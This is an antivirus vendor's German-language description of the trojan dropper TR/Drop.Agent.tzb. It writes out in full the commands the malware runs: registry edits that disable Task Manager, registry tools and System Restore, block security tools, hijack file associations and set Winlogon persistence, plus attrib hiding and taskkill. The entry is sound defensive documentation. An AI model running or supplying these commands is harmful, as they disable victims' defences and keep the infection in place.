Du brauchst Hilfe? Frage die Community oder wende dich an einen Experten.
Zu Avira Answers
Name:TR/Drop.Agent.tzb
Entdeckt am:29/12/2008
Art:Trojan
Nebenart:Dropper
In freier Wildbahn:Ja
Gemeldete Infektionen:Niedrig bis mittel
Verbreitungspotenzial:Niedrig bis mittel
Schadenspotenzial:Niedrig bis mittel
Statische Datei:Ja
Dateigröße:112.640 Bytes
MD5 Prüfsumme:46d5d944e89a3584f20583b3f2de51cb
VDF Version:7.01.01.40
IVDF Version:7.01.01.43 - Montag, 29. Dezember 2008

 Allgemein Verbreitungsmethode:
   • Autorun Dateien


Aliases:
   •  Mcafee: W32/YahLover.worm.gen
   •  Sophos: W32/Autorun-BLY
   •  Bitdefender: Worm.Generic.52609
   •  Panda: W32/VenoMLucifer.A
   •  Eset: BAT/Autorun.B


Betriebsysteme:
   • Windows 2000
   • Windows XP
   • Windows 2003


Auswirkungen:
   • Blockiert Zugriff auf verschiedene Webseiten
   • Blockiert Zugriff auf Webseiten von Sicherheitsfirmen
   • Erstellt schädliche Dateien
   • Setzt Sicherheitseinstellungen herunter
   • Änderung an der Registry

 Dateien Eine Kopie seiner selbst wird hier erzeugt:
   • %Laufwerk%\System Volume Information\LucifeR.exe



Eine Datei wird überschreiben.
%SYSDIR%\drivers\etc\hosts



Es werden folgende Dateien erstellt:

%Laufwerk%\AutoruN.inf Diese Datei ist eine nicht virulente Textdatei mit folgendem Inhalt:
   • %Programmcode, der Malware startet%

%SYSDIR%\COM17949.DLL
%TEMPDIR%\bt38830.bat Weitere Untersuchungen haben ergeben, dass diese Datei auch Malware ist. Erkannt als: BAT/Mevon.A




Es versucht folgende Dateien auszuführen:

– Dateiname:
   • cmd.exe /c %TEMPDIR%\bt38830.bat %ausgeführte Datei%


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFind /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d "2" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d "0" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoRecycleFiles /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyComputer /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v DisallowRun /t reg_dword /d "1" /f


– Dateiname:
   • taskkill /f /im Ad-Watch.EXE


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "0" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore" /v DisableConfig /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore" /v DisableSR /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 1 /t reg_sz /d "notepad.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 2 /t reg_sz /d "HijackThis.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 3 /t reg_sz /d "wordpad.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 4 /t reg_sz /d "rstrui.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 5 /t reg_sz /d "taskmgr.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 5 /t reg_sz /d "msconfig.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 6 /t reg_sz /d "regedit.exe" /f


– Dateiname:
   • attrib +s +h "%HOME%\Application Data\Micro$oft\desktop.log"


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 7 /t reg_sz /d "HiJackThis_v2.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 10 /t reg_sz /d "cmd.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 11 /t reg_sz /d "ibprocman.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 12 /t reg_sz /d "explorer.exe" /f


– Dateiname:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 13 /t reg_sz /d "integrator.exe.exe" /f


– Dateiname:
   • find /i "metroflog" "%SYSDIR%\drivers\etc\hosts"


– Dateiname:
   • reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d "www.google.com.mx" /f


– Dateiname:
   • reg add "HKCU\VenoM.LucifeR.17949179491794917949\suriV" /v "Tu has sido derrotado de nuevo por VenoM" /d "Burn in Hell" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\GPEDIT.MSC" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\attrib.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • attrib -s -h -r -a %ausgeführte Datei%


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\cmd.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\command.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\del.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\Dxdiag.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\notepad.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\reg.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\regedit.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\taskkill.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\tskill.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\HELPCTR.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\Software\Microsoft\windows\CurrentVersion\Run" /v CTFMON.EXE /t reg_sz /d "%WINDIR%\svchost.exe" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\MSCONFIG.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\VenoM.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\wordpad.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\666.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Dateiname:
   • attrib +h +s C:\WINDOWS


– Dateiname:
   • attrib +s +h "%SYSDIR%"


– Dateiname:
   • attrib +s +h "%WINDIR%\notepad.exe"


– Dateiname:
   • attrib +s +h "%SYSDIR%\notepad.exe"


– Dateiname:
   • attrib +s +h +r +a %Laufwerk%\AutoruN.inf


– Dateiname:
   • attrib +s +h "%Laufwerk%\System Volume Information\*.exe"


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows NT\CurrentVersion\winlogon" /v Shell /t reg_sz /d "Explorer.exe %Papierkorb%\NTDETECT.EXE" /f


– Dateiname:
   • attrib +s +h "%Laufwerk%\System Volume Information"


– Dateiname:
   • attrib -h -s -r -a %ausgeführte Datei%


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t reg_dword /d "1" /f


– Dateiname:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFind /t reg_dword /d "1" /f

 Registry Folgende Registryschlüssel werden hinzugefügt:

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\666.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   MSCONFIG.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer]
   • "DisallowRun"=dword:0x00000001
   • "NoFind"=dword:0x00000001
   • "NoFolderOptions"=dword:0x00000001
   • "NoPropertiesMyComputer"=dword:0x00000001
   • "NoRecycleFiles"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   HELPCTR.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore]
   • "DisableConfig"=dword:0x00000001
   • "DisableSR"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   VenoM.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   GPEDIT.MSC]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   Dxdiag.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\VenoM.LucifeR.17949179491794917949\suriV]
   • "Tu has sido derrotado de nuevo por VenoM"="Burn in Hell"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   tskill.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System]
   • "DisableRegistryTools"=dword:0x00000001
   • "DisableTaskMgr"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System]
   • "DisableRegistryTools"=dword:0x00000001
   • "DisableTaskMgr"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   taskkill.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   regedit.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   attrib.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer]
   • "NoFind"=dword:0x00000001
   • "NoFolderOptions"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\reg.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   command.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\
   DisallowRun]
   • "1"="notepad.exe"
   • "10"="cmd.exe"
   • "11"="ibprocman.exe"
   • "12"="explorer.exe"
   • "13"="integrator.exe.exe"
   • "2"="HijackThis.exe"
   • "3"="wordpad.exe"
   • "4"="rstrui.exe"
   • "5"="msconfig.exe"
   • "6"="regedit.exe"
   • "7"="HiJackThis_v2.exe"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   notepad.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\cmd.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\del.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\Software\Microsoft\windows\CurrentVersion\Run]
   • "CTFMON.EXE"="%WINDIR%\svchost.exe"



Folgende Registryschlüssel werden geändert:

– [HKLM\SOFTWARE\Classes\VBSFile\Shell\Open\Command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\inifile\shell\open\command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   wordpad.exe]
   Neuer Wert:
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Classes\MSCFile\Shell\Open\Command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\JSFile\Shell\Open\Command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\piffile\shell\open\command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\VBEFile\Shell\Open\Command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\inffile\shell\open\command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\htmlfile\shell\open\command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced]
   Neuer Wert:
   • "Hidden"=dword:0x00000002
   • "HideFileExt"=dword:0x00000001
   • "ShowSuperHidden"=dword:0x00000000

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Neuer Wert:
   • "CheckedValue"=dword:0x00000000

– [HKLM\SOFTWARE\Microsoft\windows NT\CurrentVersion\winlogon]
   Neuer Wert:
   • "Shell"="Explorer.exe %Papierkorb%\NTDETECT.EXE"

– [HKLM\SOFTWARE\Classes\batfile\shell\open\command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKCU\Software\Microsoft\Internet Explorer\Main]
   Neuer Wert:
   • "Start Page"="www.google.com.mx"

– [HKLM\SOFTWARE\Classes\cmdfile\shell\open\command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\regfile\shell\open\command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\txtfile\shell\open\command]
   Neuer Wert:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

 Hosts Die hosts Datei wird wie folgt geändert:

– In diesem Fall bleiben bestehende Einträge erhalten.

– Zugriffe auf folgende Domains wird erfolgreich unterbunden:
   • 127.0.0.1 www.metroflog.com
   • 127.0.0.1 www.hotmail.com
   • 127.0.0.1 www.google.com


 Prozess Beendigung Folgender Prozess wird beendet:
   • Ad-Watch.EXE


 Datei Einzelheiten Programmiersprache:
Das Malware-Programm wurde in Delphi geschrieben.


Laufzeitpacker:
Um eine Erkennung zu erschweren und die Größe der Datei zu reduzieren wurde sie mit einem Laufzeitpacker gepackt.

Die Beschreibung wurde erstellt von Petre Galan am Freitag, 25. Februar 2011
Die Beschreibung wurde geändert von Petre Galan am Freitag, 25. Februar 2011

zurück . . . .